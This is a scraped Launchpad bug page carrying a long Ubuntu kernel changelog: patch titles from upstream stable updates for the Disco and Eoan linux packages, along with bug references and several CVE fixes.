    - perf trace beauty ioctl: Fix off-by-one error in cmd->string table
    - media: ov9650: add a sanity check
    - ASoC: es8316: fix headphone mixer volume table
    - ACPI / CPPC: do not require the _PSD method
    - sched/cpufreq: Align trace event behavior of fast switching
    - x86/apic/vector: Warn when vector space exhaustion breaks affinity
    - arm64: kpti: ensure patched kernel text is fetched from PoU
    - x86/mm/pti: Do not invoke PTI functions when PTI is disabled
    - ASoC: fsl_ssi: Fix clock control issue in master mode
    - x86/mm/pti: Handle unaligned address gracefully in pti_clone_pagetable()
    - nvmet: fix data units read and written counters in SMART log
    - nvme-multipath: fix ana log nsid lookup when nsid is not found
    - ALSA: firewire-motu: add support for MOTU 4pre
    - iommu/amd: Silence warnings under memory pressure
    - libata/ahci: Drop PCS quirk for Denverton and beyond
    - iommu/iova: Avoid false sharing on fq_timer_on
    - libtraceevent: Change users plugin directory
    - ARM: dts: exynos: Mark LDO10 as always-on on Peach Pit/Pi Chromebooks
    - ACPI: custom_method: fix memory leaks
    - ACPI / PCI: fix acpi_pci_irq_enable() memory leak
    - closures: fix a race on wakeup from closure_sync
    - hwmon: (acpi_power_meter) Change log level for 'unsafe software power cap'
    - md/raid1: fail run raid1 array when active disk less than one
    - dmaengine: ti: edma: Do not reset reserved paRAM slots
    - kprobes: Prohibit probing on BUG() and WARN() address
    - s390/crypto: xts-aes-s390 fix extra run-time crypto self tests finding
    - x86/cpu: Add Tiger Lake to Intel family
    - platform/x86: intel_pmc_core: Do not ioremap RAM
    - ASoC: dmaengine: Make the pcm->name equal to pcm->id if the name is not set
    - raid5: don't set STRIPE_HANDLE to stripe which is in batch list
    - mmc: core: Clarify sdio_irq_pending flag for MMC_CAP2_SDIO_IRQ_NOTHREAD
    - mmc: sdhci: Fix incorrect switch to HS mode
    - mmc: core: Add helper function to indicate if SDIO IRQs is enabled
    - mmc: dw_mmc: Re-store SDIO IRQs mask at system resume
    - raid5: don't increment read_errors on EILSEQ return
    - libertas: Add missing sentinel at end of if_usb.c fw_table
    - ALSA: hda - Drop unsol event handler for Intel HDMI codecs
    - drm/amd/powerplay/smu7: enforce minimal VBITimeout (v2)
    - media: ttusb-dec: Fix info-leak in ttusb_dec_send_command()
    - ALSA: hda/realtek - Blacklist PC beep for Lenovo ThinkCentre M73/93
    - btrfs: extent-tree: Make sure we only allocate extents from block groups
      with the same type
    - media: omap3isp: Set device on omap3isp subdevs
    - PM / devfreq: passive: fix compiler warning
    - iwlwifi: fw: don't send GEO_TX_POWER_LIMIT command to FW version 36
    - ALSA: firewire-tascam: handle error code when getting current source of
      clock
    - ALSA: firewire-tascam: check intermediate state of clock status and retry
    - scsi: scsi_dh_rdac: zero cdb in send_mode_select()
    - scsi: qla2xxx: Fix Relogin to prevent modifying scan_state flag
    - printk: Do not lose last line in kmsg buffer dump
    - IB/mlx5: Free mpi in mp_slave mode
    - IB/hfi1: Define variables as unsigned long to fix KASAN warning
    - randstruct: Check member structs in is_pure_ops_struct()
    - Revert "ceph: use ceph_evict_inode to cleanup inode's resource"
    - ceph: use ceph_evict_inode to cleanup inode's resource
    - ALSA: hda/realtek - PCI quirk for Medion E4254
    - blk-mq: add callback of .cleanup_rq
    - scsi: implement .cleanup_rq callback
    - powerpc/imc: Dont create debugfs files for cpu-less nodes
    - fuse: fix missing unlock_page in fuse_writepage()
    - parisc: Disable HP HSC-PCI Cards to prevent kernel crash
    - KVM: x86: always stop emulation on page fault
    - KVM: x86: set ctxt->have_exception in x86_decode_insn()
    - KVM: x86: Manually calculate reserved bits when loading PDPTRS
    - media: sn9c20x: Add MSI MS-1039 laptop to flip_dmi_table
    - media: don't drop front-end reference count for ->detach
    - binfmt_elf: Do not move brk for INTERP-less ET_EXEC
    - ASoC: Intel: NHLT: Fix debug print format
    - ASoC: Intel: Skylake: Use correct function to access iomem space
    - ASoC: Intel: Fix use of potentially uninitialized variable
    - ARM: samsung: Fix system restart on S3C6410
    - ARM: zynq: Use memcpy_toio instead of memcpy on smp bring-up
    - arm64: tlb: Ensure we execute an ISB following walk cache invalidation
    - arm64: dts: rockchip: limit clock rate of MMC controllers for RK3328
    - alarmtimer: Use EOPNOTSUPP instead of ENOTSUPP
    - regulator: Defer init completion for a while after late_initcall
    - efifb: BGRT: Improve efifb_bgrt_sanity_check
    - gfs2: clear buf_in_tr when ending a transaction in sweep_bh_for_rgrps
    - memcg, oom: don't require __GFP_FS when invoking memcg OOM killer
    - memcg, kmem: do not fail __GFP_NOFAIL charges
    - i40e: check __I40E_VF_DISABLE bit in i40e_sync_filters_subtask
    - block: fix null pointer dereference in blk_mq_rq_timed_out()
    - smb3: allow disabling requesting leases
    - ovl: Fix dereferencing possible ERR_PTR()
    - ovl: filter of trusted xattr results in audit
    - btrfs: fix allocation of free space cache v1 bitmap pages
    - Btrfs: fix use-after-free when using the tree modification log
    - btrfs: Relinquish CPUs in btrfs_compare_trees
    - btrfs: qgroup: Fix the wrong target io_tree when freeing reserved data space
    - btrfs: qgroup: Fix reserved data space leak if we have multiple reserve
      calls
    - Btrfs: fix race setting up and completing qgroup rescan workers
    - md/raid6: Set R5_ReadError when there is read failure on parity disk
    - md: don't report active array_state until after revalidate_disk() completes.
    - md: only call set_in_sync() when it is expected to succeed.
    - cfg80211: Purge frame registrations on iftype change
    - /dev/mem: Bail out upon SIGKILL.
    - ext4: fix warning inside ext4_convert_unwritten_extents_endio
    - ext4: fix punch hole for inline_data file systems
    - quota: fix wrong condition in is_quota_modification()
    - hwrng: core - don't wait on add_early_randomness()
    - i2c: riic: Clear NACK in tend isr
    - CIFS: fix max ea value size
    - CIFS: Fix oplock handling for SMB 2.1+ protocols
    - md/raid0: avoid RAID0 data corruption due to layout confusion.
    - fuse: fix deadlock with aio poll and fuse_iqueue::waitq.lock
    - mm/compaction.c: clear total_{migrate,free}_scanned before scanning a new
      zone
    - drm/amd/display: Restore backlight brightness after system resume
    - selftests: Update fib_tests to handle missing ping6
    - vrf: Do not attempt to create IPv6 mcast rule if IPv6 is disabled
    - net/mlx5e: Fix traffic duplication in ethtool steering
    - media: vivid:add sanity check to avoid divide error and set value to 1 if 0.
    - media: vb2: reorder checks in vb2_poll()
    - media: vivid: work around high stack usage with clang
    - rcu/tree: Call setschedule() gp ktread to SCHED_FIFO outside of atomic
      region
    - arm64: mm: free the initrd reserved memblock in a aligned manner
    - soc: amlogic: meson-clk-measure: protect measure with a mutex
    - RAS: Build debugfs.o only when enabled in Kconfig
    - ASoC: hdac_hda: fix page fault issue by removing race
    - perf tools: Fix paths in include statements
    - blk-mq: Fix memory leak in blk_mq_init_allocated_queue error handling
    - media: i2c: tda1997x: prevent potential NULL pointer access
    - arm64/efi: Move variable assignments after SECTIONS
    - ARM: xscale: fix multi-cpu compilation
    - kasan/arm64: fix CONFIG_KASAN_SW_TAGS && KASAN_INLINE
    - x86/platform/intel/iosf_mbi Rewrite locking
    - powerpc/Makefile: Always pass --synthetic to nm if supported
    - ACPI / APEI: Release resources if gen_pool_add() fails
    - ARM: at91: move platform-specific asm-offset.h to arch/arm/mach-at91
    - soc: renesas: rmobile-sysc: Set GENPD_FLAG_ALWAYS_ON for always-on domain
    - soc: renesas: Enable ARM_ERRATA_754322 for affected Cortex-A9
    - PM / devfreq: Fix kernel oops on governor module load
    - media: aspeed-video: address a protential usage of an unitialized var
    - ASoC: Intel: Haswell: Adjust machine device private context
    - x86/amd_nb: Add PCI device IDs for family 17h, model 70h
    - hwmon: (k10temp) Add support for AMD family 17h, model 70h CPUs
    - block: make rq sector size accessible for block stats
    - mmc: mtk-sd: Re-store SDIO IRQs mask at system resume
    - drm: fix module name in edid_firmware log message
    - zd1211rw: remove false assertion from zd_mac_clear()
    - btrfs: delayed-inode: Kill the BUG_ON() in btrfs_delete_delayed_dir_index()
    - kvm: Nested KVM MMUs need PAE root too
    - ARM: dts: logicpd-torpedo-baseboard: Fix missing video
    - ARM: omap2plus_defconfig: Fix missing video
    - ARM: dts: am3517-evm: Fix missing video
    - rcu/tree: Fix SCHED_FIFO params
    - fuse: fix beyond-end-of-page access in fuse_parse_cache()
    - KVM: x86: Disable posted interrupts for non-standard IRQs delivery modes
    - spi: spi-fsl-dspi: Exit the ISR with IRQ_NONE when it's not ours
    - iommu/arm-smmu-v3: Disable detection of ATS and PRI
    - mt76: round up length on mt76_wr_copy
    - ath10k: fix channel info parsing for non tlv target
    - block: mq-deadline: Fix queue restart handling
    - btrfs: adjust dirty_metadata_bytes after writeback failure of extent buffer
    - SUNRPC: Fix buffer handling of GSS MIC without slack
    - ACPI / LPSS: Save/restore LPSS private registers also on Lynxpoint
    - fs: Export generic_fadvise()
    - mm: Handle MADV_WILLNEED through vfs_fadvise()
    - xfs: Fix stale data exposure when readahead races with hole punch
    - ipmi: move message error checking to avoid deadlock

* ELAN469D touch pad not working (LP: #1795292) // Ubuntu won't boot on Dell
    Inspiron 7375 (LP: #1837688) // Disco update: upstream stable patchset
    2019-10-16 (LP: #1848367)
    - iommu/amd: Override wrong IVRS IOAPIC on Raven Ridge systems

* intel-lpss driver conflicts with write-combining MTRR region (LP: #1845584)
    - SAUCE: mfd: intel-lpss: add quirk for Dell XPS 13 7390 2-in-1

* Fix non-working Realtek USB ethernet after system resume (LP: #1847063)
    - r8152: remove extra action copying ethernet address
    - r8152: Refresh MAC address during USBDEVFS_RESET
    - r8152: Set macpassthru in reset_resume callback

* overlayfs: allow with shiftfs as underlay (LP: #1846272)
    - SAUCE: overlayfs: allow with shiftfs as underlay

* [regression] NoNewPrivileges incompatible with Apparmor (LP: #1844186)
    - SAUCE: apparmor: fix nnp subset test for unconfined

* PM / hibernate: fix potential memory corruption (LP: #1847118)
    - PM / hibernate: memory_bm_find_bit(): Tighten node optimisation

* xHCI on AMD Stoney Ridge cannot detect USB 2.0 or 1.1 devices.
    (LP: #1846470)
    - x86/PCI: Avoid AMD FCH XHCI USB PME# from D0 defect

* CVE-2019-17056
    - nfc: enforce CAP_NET_RAW for raw sockets

* CVE-2019-17055
    - mISDN: enforce CAP_NET_RAW for raw sockets

* CVE-2019-17054
    - appletalk: enforce CAP_NET_RAW for raw sockets

* CVE-2019-17053
    - ieee802154: enforce CAP_NET_RAW for raw sockets

* CVE-2019-17052
    - ax25: enforce CAP_NET_RAW for raw sockets

* CVE-2019-15098
    - ath6kl: fix a NULL-ptr-deref bug in ath6kl_usb_alloc_urb_from_pipe()

* Disco update: upstream stable patchset 2019-10-10 (LP: #1847663)
    - Revert "Bluetooth: validate BLE connection interval updates"
    - net/ibmvnic: free reset work of removed device from queue
    - powerpc/xive: Fix bogus error code returned by OPAL
    - drm/amd/display: readd -msse2 to prevent Clang from emitting libcalls to
      undefined SW FP routines
    - HID: prodikeys: Fix general protection fault during probe
    - HID: sony: Fix memory corruption issue on cleanup.
    - HID: logitech: Fix general protection fault caused by Logitech driver
    - HID: hidraw: Fix invalid read in hidraw_ioctl
    - HID: Add quirk for HP X500 PIXART OEM mouse
    - mtd: cfi_cmdset_0002: Use chip_good() to retry in do_write_oneword()
    - crypto: talitos - fix missing break in switch statement
    - CIFS: fix deadlock in cached root handling
    - ASoC: Intel: cht_bsw_max98090_ti: Enable codec clock once and keep it
      enabled
    - ASoC: fsl: Fix of-node refcount unbalance in fsl_ssi_probe_from_dt()
    - ALSA: usb-audio: Add Hiby device family to quirks for native DSD support
    - ALSA: usb-audio: Add DSD support for EVGA NU Audio
    - ALSA: dice: fix wrong packet parameter for Alesis iO26
    - ALSA: hda - Add laptop imic fixup for ASUS M9V laptop
    - ALSA: hda - Apply AMD controller workaround for Raven platform
    - objtool: Clobber user CFLAGS variable
    - irqchip/gic-v3-its: Fix LPI release for Multi-MSI devices
    - f2fs: check all the data segments against all node ones
    - PCI: hv: Avoid use of hv_pci_dev->pci_slot after freeing it
    - bcache: remove redundant LIST_HEAD(journal) from run_cache_set()
    - initramfs: don't free a non-existent initrd
    - Revert "f2fs: avoid out-of-range memory access"
    - dm zoned: fix invalid memory access
    - net/ibmvnic: Fix missing { in __ibmvnic_reset
    - f2fs: fix to do sanity check on segment bitmap of LFS curseg
    - drm: Flush output polling on shutdown
    - net: don't warn in inet diag when IPV6 is disabled
    - Bluetooth: btrtl: HCI reset on close for Realtek BT chip
    - ACPI: video: Add new hw_changes_brightness quirk, set it on PB Easynote MZ35
    - drm/nouveau/disp/nv50-: fix center/aspect-corrected scaling
    - xfs: don't crash on null attr fork xfs_bmapi_read
    - netfilter: nft_socket: fix erroneous socket assignment
    - Bluetooth: btrtl: Additional Realtek 8822CE Bluetooth devices
    - net_sched: check cops->tcf_block in tc_bind_tclass()
    - net/rds: An rds_sock is added too early to the hash table
    - net/rds: Check laddr_check before calling it
    - f2fs: use generic EFSBADCRC/EFSCORRUPTED
    - phy: qcom-qmp: Raise qcom_qmp_phy_enable() polling delay
    - drm/amd/display: Allow cursor async updates for framebuffer swaps
    - drm/amd/display: Skip determining update type for async updates
    - drm/amd/display: Don't replace the dc_state for fast updates
    - platform/x86: i2c-multi-instantiate: Derive the device name from parent
    - drm/dp: Add DP_DPCD_QUIRK_NO_SINK_COUNT
    - xfrm: policy: avoid warning splat when merging nodes

* Disco update: upstream stable patchset 2019-10-01 (LP: #1846277)
    - netfilter: nf_flow_table: set default timeout after successful insertion
    - HID: wacom: generic: read HID_DG_CONTACTMAX from any feature report
    - Input: elan_i2c - remove Lenovo Legion Y7000 PnpID
    - powerpc/mm/radix: Use the right page size for vmemmap mapping
    - USB: usbcore: Fix slab-out-of-bounds bug during device reset
    - media: tm6000: double free if usb disconnect while streaming
    - phy: renesas: rcar-gen3-usb2: Disable clearing VBUS in over-current
    - ip6_gre: fix a dst leak in ip6erspan_tunnel_xmit
    - udp: correct reuseport selection with connected sockets
    - xen-netfront: do not assume sk_buff_head list is empty in error handling
    - net_sched: let qdisc_put() accept NULL pointer
    - firmware: google: check if size is valid when decoding VPD data
    - serial: sprd: correct the wrong sequence of arguments
    - tty/serial: atmel: reschedule TX after RX was started
    - nl80211: Fix possible Spectre-v1 for CQM RSSI thresholds
    - ieee802154: hwsim: Fix error handle path in hwsim_init_module
    - ieee802154: hwsim: unregister hw while hwsim_subscribe_all_others fails
    - ARM: dts: am57xx: Disable voltage switching for SD card
    - ARM: OMAP2+: Fix missing SYSC_HAS_RESET_STATUS for dra7 epwmss
    - bus: ti-sysc: Fix using configured sysc mask value
    - s390/bpf: fix lcgr instruction encoding
    - ARM: OMAP2+: Fix omap4 errata warning on other SoCs
    - ARM: dts: dra74x: Fix iodelay configuration for mmc3
    - ARM: OMAP1: ams-delta-fiq: Fix missing irq_ack
    - bus: ti-sysc: Simplify cleanup upon failures in sysc_probe()
    - s390/bpf: use 32-bit index for tail calls
    - selftests/bpf: fix "bind{4, 6} deny specific IP & port" on s390
    - tools: bpftool: close prog FD before exit on showing a single program
    - fpga: altera-ps-spi: Fix getting of optional confd gpio
    - netfilter: ebtables: Fix argument order to ADD_COUNTER
    - netfilter: nft_flow_offload: missing netlink attribute policy
    - netfilter: xt_nfacct: Fix alignment mismatch in xt_nfacct_match_info
    - NFSv4: Fix return values for nfs4_file_open()
    - NFSv4: Fix return value in nfs_finish_open()
    - NFS: Fix initialisation of I/O result struct in nfs_pgio_rpcsetup
    - Kconfig: Fix the reference to the IDT77105 Phy driver in the description of
      ATM_NICSTAR_USE_IDT77105
    - xdp: unpin xdp umem pages in error path
    - qed: Add cleanup in qed_slowpath_start()
    - ARM: 8874/1: mm: only adjust sections of valid mm structures
    - batman-adv: Only read OGM2 tvlv_len after buffer len check
    - bpf: allow narrow loads of some sk_reuseport_md fields with offset > 0
    - r8152: Set memory to all 0xFFs on failed reg reads
    - x86/apic: Fix arch_dynirq_lower_bound() bug for DT enabled machines
    - netfilter: xt_physdev: Fix spurious error message in physdev_mt_check
    - netfilter: nf_conntrack_ftp: Fix debug output
    - NFSv2: Fix eof handling
    - NFSv2: Fix write regression
    - kallsyms: Don't let kallsyms_lookup_size_offset() fail on retrieving the
      first symbol
    - cifs: set domainName when a domain-key is used in multiuser
    - cifs: Use kzfree() to zero out the password
    - usb: host: xhci-tegra: Set DMA mask correctly
    - ARM: 8901/1: add a criteria for pfn_valid of arm
    - ibmvnic: Do not process reset during or after device removal
    - sky2: Disable MSI on yet another ASUS boards (P6Xxxx)
    - i2c: designware: Synchronize IRQs when unregistering slave client
    - perf/x86/intel: Restrict period on Nehalem
    - perf/x86/amd/ibs: Fix sample bias for dispatched micro-ops
    - amd-xgbe: Fix error path in xgbe_mod_init()
    - tools/power x86_energy_perf_policy: Fix "uninitialized variable" warnings at
      -O2
    - tools/power x86_energy_perf_policy: Fix argument parsing
    - tools/power turbostat: fix buffer overrun
    - net: aquantia: fix out of memory condition on rx side
    - net: seeq: Fix the function used to release some memory in an error handling
      path
    - dmaengine: ti: dma-crossbar: Fix a memory leak bug
    - dmaengine: ti: omap-dma: Add cleanup in omap_dma_probe()
    - x86/uaccess: Don't leak the AC flags into __get_user() argument evaluation
    - x86/hyper-v: Fix overflow bug in fill_gva_list()
    - keys: Fix missing null pointer check in request_key_auth_describe()
    - iommu/amd: Flush old domains in kdump kernel
    - iommu/amd: Fix race in increase_address_space()
    - ovl: fix regression caused by overlapping layers detection
    - floppy: fix usercopy direction
    - binfmt_elf: move brk out of mmap when doing direct loader exec
    - SUNRPC: Handle connection breakages correctly in call_status()
    - nfs: disable client side deduplication
    - net: aquantia: fix limit of vlan filters
    - net: dsa: Fix load order between DSA drivers and taggers
    - ARM: dts: Fix flags for gpio7
    - bus: ti-sysc: Handle devices with no control registers
    - ARM: dts: Fix incorrect dcan register mapping for am3, am4 and dra7
    - ARM: dts: am335x: Fix UARTs length
    - ARM: dts: Fix incomplete dts data for am3 and am4 mmc
    - selftests/bpf: fix test_cgroup_storage on s390
    - flow_dissector: Fix potential use-after-free on BPF_PROG_DETACH
    - drm/amdgpu: fix dma_fence_wait without reference
    - netfilter: conntrack: make sysctls per-namespace again
    - drm/amd/powerplay: correct Vega20 dpm level related settings
    - libceph: don't call crypto_free_sync_skcipher() on a NULL tfm
    - i2c: iproc: Stop advertising support of SMBUS quick cmd
    - netfilter: nf_flow_table: clear skb tstamp before xmit
    - tools/power turbostat: Fix Haswell Core systems
    - net: aquantia: fix removal of vlan 0
    - net: aquantia: reapply vlan filters on up
    - arm64: dts: renesas: r8a77995: draak: Fix backlight regulator name
    - dmaengine: sprd: Fix the DMA link-list configuration
    - dmaengine: rcar-dmac: Fix DMACHCLR handling if iommu is mapped
    - Revert "arm64: Remove unnecessary ISBs from set_{pte,pmd,pud}"

-- Stefan Bader <stefan.bader@canonical.com>  Sat, 09 Nov 2019 17:31:21 +0100

Changed in linux (Ubuntu Disco):
status:	Fix Committed → Fix Released

Revision history for this message

Launchpad Janitor (janitor) wrote on 2019-12-06:

#22

Download full text (33.2 KiB)

This bug was fixed in the package linux - 5.3.0-24.26

---------------
linux (5.3.0-24.26) eoan; urgency=medium

* eoan/linux: 5.3.0-24.26 -proposed tracker (LP: #1852232)

This bug was fixed in the package linux - 5.3.0-24.26

---------------
linux (5.3.0-24.26) eoan; urgency=medium

* eoan/linux: 5.3.0-24.26 -proposed tracker (LP: #1852232)

* Eoan update: 5.3.9 upstream stable release (LP: #1851550)
    - io_uring: fix up O_NONBLOCK handling for sockets
    - dm snapshot: introduce account_start_copy() and account_end_copy()
    - dm snapshot: rework COW throttling to fix deadlock
    - Btrfs: fix inode cache block reserve leak on failure to allocate data space
    - btrfs: qgroup: Always free PREALLOC META reserve in
      btrfs_delalloc_release_extents()
    - iio: adc: meson_saradc: Fix memory allocation order
    - iio: fix center temperature of bmc150-accel-core
    - libsubcmd: Make _FORTIFY_SOURCE defines dependent on the feature
    - perf tests: Avoid raising SEGV using an obvious NULL dereference
    - perf map: Fix overlapped map handling
    - perf script brstackinsn: Fix recovery from LBR/binary mismatch
    - perf jevents: Fix period for Intel fixed counters
    - perf tools: Propagate get_cpuid() error
    - perf annotate: Propagate perf_env__arch() error
    - perf annotate: Fix the signedness of failure returns
    - perf annotate: Propagate the symbol__annotate() error return
    - perf annotate: Fix arch specific ->init() failure errors
    - perf annotate: Return appropriate error code for allocation failures
    - perf annotate: Don't return -1 for error when doing BPF disassembly
    - staging: rtl8188eu: fix null dereference when kzalloc fails
    - RDMA/siw: Fix serialization issue in write_space()
    - RDMA/hfi1: Prevent memory leak in sdma_init
    - RDMA/iw_cxgb4: fix SRQ access from dump_qp()
    - RDMA/iwcm: Fix a lock inversion issue
    - HID: hyperv: Use in-place iterator API in the channel callback
    - kselftest: exclude failed TARGETS from runlist
    - selftests/kselftest/runner.sh: Add 45 second timeout per test
    - nfs: Fix nfsi->nrequests count error on nfs_inode_remove_request
    - arm64: cpufeature: Effectively expose FRINT capability to userspace
    - arm64: Fix incorrect irqflag restore for priority masking for compat
    - arm64: ftrace: Ensure synchronisation in PLT setup for Neoverse-N1 #1542419
    - tty: serial: owl: Fix the link time qualifier of 'owl_uart_exit()'
    - tty: serial: rda: Fix the link time qualifier of 'rda_uart_exit()'
    - serial/sifive: select SERIAL_EARLYCON
    - tty: n_hdlc: fix build on SPARC
    - misc: fastrpc: prevent memory leak in fastrpc_dma_buf_attach
    - RDMA/core: Fix an error handling path in 'res_get_common_doit()'
    - RDMA/cm: Fix memory leak in cm_add/remove_one
    - RDMA/nldev: Reshuffle the code to avoid need to rebind QP in error path
    - RDMA/mlx5: Do not allow rereg of a ODP MR
    - RDMA/mlx5: Order num_pending_prefetch properly with synchronize_srcu
    - RDMA/mlx5: Add missing synchronize_srcu() for MW cases
    - gpio: max77620: Use correct unit for debounce times
    - fs: cifs: mute -Wunused-const-variable message
    - arm64: vdso32: Fix broken compat vDSO build warnings
    - arm64: vdso32: Detect binutils support for dmb ishld
    - serial: mctrl_gpio: Check for NULL pointer
    - serial: 8250_omap: Fix gpio check for auto RTS/CTS
    - arm64: Default to building compat vDSO with clang when CONFIG_CC_IS_CLANG
    - arm64: vdso32: Don't use KBUILD_CPPFLAGS unconditionally
    - efi/cper: Fix endianness of PCIe class code
    - efi/x86: Do not clean dummy variable in kexec path
    - MIPS: include: Mark __cmpxchg as __always_inline
    - riscv: avoid kernel hangs when trapped in BUG()
    - riscv: avoid sending a SIGTRAP to a user thread trapped in WARN()
    - riscv: Correct the handling of unexpected ebreak in do_trap_break()
    - x86/xen: Return from panic notifier
    - ocfs2: clear zero in unaligned direct IO
    - fs: ocfs2: fix possible null-pointer dereferences in
      ocfs2_xa_prepare_entry()
    - fs: ocfs2: fix a possible null-pointer dereference in
      ocfs2_write_end_nolock()
    - fs: ocfs2: fix a possible null-pointer dereference in
      ocfs2_info_scan_inode_alloc()
    - btrfs: silence maybe-uninitialized warning in clone_range
    - arm64: armv8_deprecated: Checking return value for memory allocation
    - sched/fair: Scale bandwidth quota and period without losing quota/period
      ratio precision
    - sched/vtime: Fix guest/system mis-accounting on task switch
    - perf/core: Rework memory accounting in perf_mmap()
    - perf/core: Fix corner case in perf_rotate_context()
    - perf/x86/amd: Change/fix NMI latency mitigation to use a timestamp
    - drm/amdgpu: fix memory leak
    - iio: imu: adis16400: release allocated memory on failure
    - iio: imu: adis16400: fix memory leak
    - iio: imu: st_lsm6dsx: fix waitime for st_lsm6dsx i2c controller
    - MIPS: include: Mark __xchg as __always_inline
    - MIPS: fw: sni: Fix out of bounds init of o32 stack
    - s390/cio: fix virtio-ccw DMA without PV
    - virt: vbox: fix memory leak in hgcm_call_preprocess_linaddr
    - nbd: fix possible sysfs duplicate warning
    - NFSv4: Fix leak of clp->cl_acceptor string
    - SUNRPC: fix race to sk_err after xs_error_report
    - s390/uaccess: avoid (false positive) compiler warnings
    - tracing: Initialize iter->seq after zeroing in tracing_read_pipe()
    - perf annotate: Fix multiple memory and file descriptor leaks
    - perf/aux: Fix tracking of auxiliary trace buffer allocation
    - USB: legousbtower: fix a signedness bug in tower_probe()
    - nbd: verify socket is supported during setup
    - fuse: flush dirty data/metadata before non-truncate setattr
    - fuse: truncate pending writes on O_TRUNC
    - ALSA: bebob: Fix prototype of helper function to return negative value
    - ALSA: timer: Fix mutex deadlock at releasing card
    - ath10k: fix latency issue for QCA988x
    - UAS: Revert commit 3ae62a42090f ("UAS: fix alignment of scatter/gather
      segments")
    - nl80211: fix validation of mesh path nexthop
    - USB: gadget: Reject endpoints with 0 maxpacket value
    - usb-storage: Revert commit 747668dbc061 ("usb-storage: Set
      virt_boundary_mask to avoid SG overflows")
    - USB: ldusb: fix ring-buffer locking
    - USB: ldusb: fix control-message timeout
    - usb: xhci: fix Immediate Data Transfer endianness
    - usb: xhci: fix __le32/__le64 accessors in debugfs code
    - USB: serial: whiteheat: fix potential slab corruption
    - USB: serial: whiteheat: fix line-speed endianness
    - xhci: Fix use-after-free regression in xhci clear hub TT implementation
    - scsi: qla2xxx: Fix partial flash write of MBI
    - scsi: target: cxgbit: Fix cxgbit_fw4_ack()
    - HID: i2c-hid: add Trekstor Primebook C11B to descriptor override
    - HID: Fix assumption that devices have inputs
    - HID: fix error message in hid_open_report()
    - HID: logitech-hidpp: split g920_get_config()
    - HID: logitech-hidpp: rework device validation
    - HID: logitech-hidpp: do all FF cleanup in hidpp_ff_destroy()
    - um-ubd: Entrust re-queue to the upper layers
    - s390/unwind: fix mixing regs and sp
    - s390/cmm: fix information leak in cmm_timeout_handler()
    - s390/idle: fix cpu idle time calculation
    - ARC: perf: Accommodate big-endian CPU
    - IB/hfi1: Avoid excessive retry for TID RDMA READ request
    - arm64: Ensure VM_WRITE|VM_SHARED ptes are clean by default
    - arm64: cpufeature: Enable Qualcomm Falkor/Kryo errata 1003
    - virtio_ring: fix stalls for packed rings
    - rtlwifi: rtl_pci: Fix problem of too small skb->len
    - dmaengine: qcom: bam_dma: Fix resource leak
    - dmaengine: tegra210-adma: fix transfer failure
    - dmaengine: imx-sdma: fix size check for sdma script_number
    - dmaengine: cppi41: Fix cppi41_dma_prep_slave_sg() when idle
    - drm/amdgpu/gmc10: properly set BANK_SELECT and FRAGMENT_SIZE
    - drm/i915: Fix PCH reference clock for FDI on HSW/BDW
    - drm/amdgpu/gfx10: update gfx golden settings
    - drm/amdgpu/powerplay/vega10: allow undervolting in p7
    - drm/amdgpu: Fix SDMA hang when performing VKexample test
    - NFS: Fix an RCU lock leak in nfs4_refresh_delegation_stateid()
    - io_uring: ensure we clear io_kiocb->result before each issue
    - iommu/vt-d: Fix panic after kexec -p for kdump
    - batman-adv: Avoid free/alloc race when handling OGM buffer
    - llc: fix sk_buff leak in llc_sap_state_process()
    - llc: fix sk_buff leak in llc_conn_service()
    - rxrpc: Fix call ref leak
    - rxrpc: rxrpc_peer needs to hold a ref on the rxrpc_local record
    - rxrpc: Fix trace-after-put looking at the put peer record
    - NFC: pn533: fix use-after-free and memleaks
    - bonding: fix potential NULL deref in bond_update_slave_arr
    - netfilter: conntrack: avoid possible false sharing
    - net: usb: sr9800: fix uninitialized local variable
    - sch_netem: fix rcu splat in netem_enqueue()
    - net: sched: sch_sfb: don't call qdisc_put() while holding tree lock
    - iwlwifi: exclude GEO SAR support for 3168
    - sched/fair: Fix low cpu usage with high throttling by removing expiration of
      cpu-local slices
    - ALSA: usb-audio: DSD auto-detection for Playback Designs
    - ALSA: usb-audio: Update DSD support quirks for Oppo and Rotel
    - ALSA: usb-audio: Add DSD support for Gustard U16/X26 USB Interface
    - RDMA/mlx5: Use irq xarray locking for mkey_table
    - sched/fair: Fix -Wunused-but-set-variable warnings
    - powerpc/powernv: Fix CPU idle to be called with IRQs disabled
    - Revert "nvme: allow 64-bit results in passthru commands"
    - Revert "ALSA: hda: Flush interrupts on disabling"
    - Linux 5.3.9
    - [Config] Remove CONFIG_GENERIC_COMPAT_VDSO and
      CONFIG_CROSS_COMPILE_COMPAT_VDSO

* Eoan update: v5.3.8 upstream stable release (LP: #1850456)
    - drm: Free the writeback_job when it with an empty fb
    - drm: Clear the fence pointer when writeback job signaled
    - clk: ti: dra7: Fix mcasp8 clock bits
    - ARM: dts: Fix wrong clocks for dra7 mcasp
    - nvme-pci: Fix a race in controller removal
    - scsi: ufs: skip shutdown if hba is not powered
    - scsi: megaraid: disable device when probe failed after enabled device
    - scsi: qla2xxx: Silence fwdump template message
    - scsi: qla2xxx: Fix unbound sleep in fcport delete path.
    - scsi: qla2xxx: Fix stale mem access on driver unload
    - scsi: qla2xxx: Fix N2N link reset
    - scsi: qla2xxx: Fix N2N link up fail
    - ARM: dts: Fix gpio0 flags for am335x-icev2
    - ARM: OMAP2+: Fix missing reset done flag for am3 and am43
    - ARM: OMAP2+: Add missing LCDC midlemode for am335x
    - ARM: OMAP2+: Fix warnings with broken omap2_set_init_voltage()
    - nvme-tcp: fix wrong stop condition in io_work
    - nvme-pci: Save PCI state before putting drive into deepest state
    - nvme: fix an error code in nvme_init_subsystem()
    - nvme-rdma: Fix max_hw_sectors calculation
    - Added QUIRKs for ADATA XPG SX8200 Pro 512GB
    - nvme: Add quirk for Kingston NVME SSD running FW E8FK11.T
    - nvme: allow 64-bit results in passthru commands
    - drm/komeda: prevent memory leak in komeda_wb_connector_add
    - nvme-rdma: fix possible use-after-free in connect timeout
    - blk-mq: honor IO scheduler for multiqueue devices
    - ieee802154: ca8210: prevent memory leak
    - ARM: dts: am4372: Set memory bandwidth limit for DISPC
    - net: dsa: qca8k: Use up to 7 ports for all operations
    - MIPS: dts: ar9331: fix interrupt-controller size
    - xen/efi: Set nonblocking callbacks
    - loop: change queue block size to match when using DIO
    - nl80211: fix null pointer dereference
    - mac80211: fix txq null pointer dereference
    - netfilter: nft_connlimit: disable bh on garbage collection
    - net: mscc: ocelot: add missing of_node_put after calling
      of_get_child_by_name
    - net: dsa: rtl8366rb: add missing of_node_put after calling
      of_get_child_by_name
